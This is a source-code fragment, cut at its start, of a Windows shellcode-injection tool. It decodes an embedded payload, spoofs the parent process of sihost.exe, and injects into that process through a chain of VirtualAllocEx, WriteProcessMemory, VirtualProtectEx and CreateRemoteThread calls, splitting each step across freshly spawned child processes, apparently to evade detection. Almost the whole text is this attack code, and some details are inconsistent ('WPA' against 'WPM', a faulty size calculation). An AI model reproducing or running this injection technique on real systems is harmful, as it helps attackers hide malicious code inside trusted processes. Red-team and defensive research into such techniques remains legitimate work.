	"WPA",
	"VP",
	"CRT"
	};

	int parseArgs1(const wchar_t *arg)
	{
	if (arg == NULL)
	return 0;

	if (wcscmp(arg, L"VA") == 0)
	return 1;

	if (wcscmp(arg, L"WPM") == 0)
	return 2;

	if (wcscmp(arg, L"VP") == 0)
	return 3;

	if (wcscmp(arg, L"CRT") == 0)
	return 4;

	return 0;
	}

	int wmain(int argc, wchar_t *argv[])
	{
	PRINTF("[*] ...Running Main\n");
	STARTUPINFOA si;
	si = {};
	PROCESS_INFORMATION child = {};
	int targetPid;
	DWORD fakePPIDPid = 0;
	DWORD returnLength = 0;
	WCHAR fakePPID[] = L"sihost.exe";
	WCHAR target[] = L"sihost.exe";
	BOOL result = TRUE;

	int c = 0;
	if (argc > 1)
	c = parseArgs1(argv[1]);

	SIZE_T size = 0;
	void* shellcode = DecodeShellcode(&size);

	SIZE_T mem_size = ((size % 4096) == 0) ? size : (size / 4096) + 4096;
	DWORD old = 0;

	char targetImage[MAX_PATH] = {};

	const char* base = ".\\RemoteThreadInject.exe %s";
	const char* prefix = "null";

	fakePPIDPid = FindProcByName(fakePPID);

	HANDLE remoteThread = NULL;

	switch(c) {
	case 0:{
	PRINTF("[*] Step 0 - Process PID is: %d\n", GetCurrentProcessId());
	targetPid = FindProcByName(target);
	PRINTF("%d target image\n", targetPid);
	remoteProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, TRUE, targetPid);
	PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle);
	if (remoteProcessHandle == NULL) {
	PRINTF("Cannot open processs. LastError %d\n", GetLastError());
	return 1;
	}
	WCHAR prefix_new[] = L"VA";
	PRINTF("%s target image\n", targetImage);
	CreateProcessWithParent(fakePPIDPid, prefix_new);
	ExitProcess(0);
	break;
	}
	case 1: {
	PRINTF("[*] Step 1 - Current PID is: %d\n", GetCurrentProcessId());
	PRINTF("\t[*] Executing Virtual Alloc");
	PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle);
	sharedRemoteBuffer = VirtualAllocEx(remoteProcessHandle, NULL, mem_size, (MEM_RESERVE \| MEM_COMMIT), PAGE_READWRITE);
	PRINTF("\t[*] shared buffer at: 0x%x\n", sharedRemoteBuffer);

	if (sharedRemoteBuffer == NULL) {
	PRINTF("Cannot allocate memory on remote process. LastError %d", GetLastError());
	return 1;
	}
	WCHAR prefix_new[] = L"WPM";
	CreateProcessWithParent(fakePPIDPid, prefix_new);
	ExitProcess(0);
	break; }
	case 2: {
	PRINTF("[*] Step 2 - Current PID is: %d", GetCurrentProcessId());
	PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle);
	PRINTF("\t[*] Executing Write Process Memory");
	if (WriteProcessMemory(remoteProcessHandle, sharedRemoteBuffer, shellcode, size, NULL) == FALSE) {
	PRINTF("Error using WriteProcessMemory. LastError %d", GetLastError());
	return 1;
	}

	memset(shellcode, 0, size);
	free(shellcode);
	WCHAR prefix_new[] = L"VP";
	CreateProcessWithParent(fakePPIDPid, prefix_new);
	ExitProcess(0);
	break; }
	case 3: {
	PRINTF("[*] Step 3 - Current PID is: %d", GetCurrentProcessId());
	PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle);
	PRINTF("\t[*] Executing Virtual Protect");
	if (VirtualProtectEx(remoteProcessHandle, sharedRemoteBuffer, mem_size, PAGE_EXECUTE_READWRITE, &old) == FALSE) {
	PRINTF("Error on VirtualProtectEx. LastError %d", GetLastError());
	return 1;
	}

	WCHAR prefix_new[] = L"CRT";
	CreateProcessWithParent(fakePPIDPid, prefix_new);
	ExitProcess(0); }
	case 4: {
	PRINTF("[*] Step 4 - Current PID is: %d", GetCurrentProcessId());
	PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandleDup);
	PRINTF("\t[*] Executing Create Remote Thread");
	remoteThread = CreateRemoteThread(remoteProcessHandleDup, NULL, 0, (LPTHREAD_START_ROUTINE)sharedRemoteBuffer, NULL, 0, NULL);
	if (remoteThread == NULL) {
	PRINTF("Cannot Create Thread on remote process. LastError %d", GetLastError());
	return 1;
	}
	WaitForSingleObject(remoteThread, INFINITE);
	PRINTF("[*] - Exiting");
	ExitProcess(0);
	break; }
	}

	ResumeThread(child.hThread);
	WaitForSingleObject(child.hProcess, INFINITE);
	CloseHandle(child.hThread);
	CloseHandle(child.hProcess);
	remoteProcessHandle = NULL;
	if (remoteProcessHandle != NULL) {
	CloseHandle(remoteProcessHandle);
	}
	return 0;
	}

	int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
	{
	LPWSTR* szArglist;
	int nArgs;
	int i;

	PRINTF("[*] ...Running WinMain\n");
	szArglist = CommandLineToArgvW(GetCommandLineW(), &nArgs);
	if (NULL == szArglist)
	{
	PRINTF("CommandLineToArgvW failed\n");
	return 0;
	}
	else for (i = 0; i < nArgs; i++) PRINTF("%d: %ws", i, szArglist[i]);

	wmain(nArgs, szArglist);
	}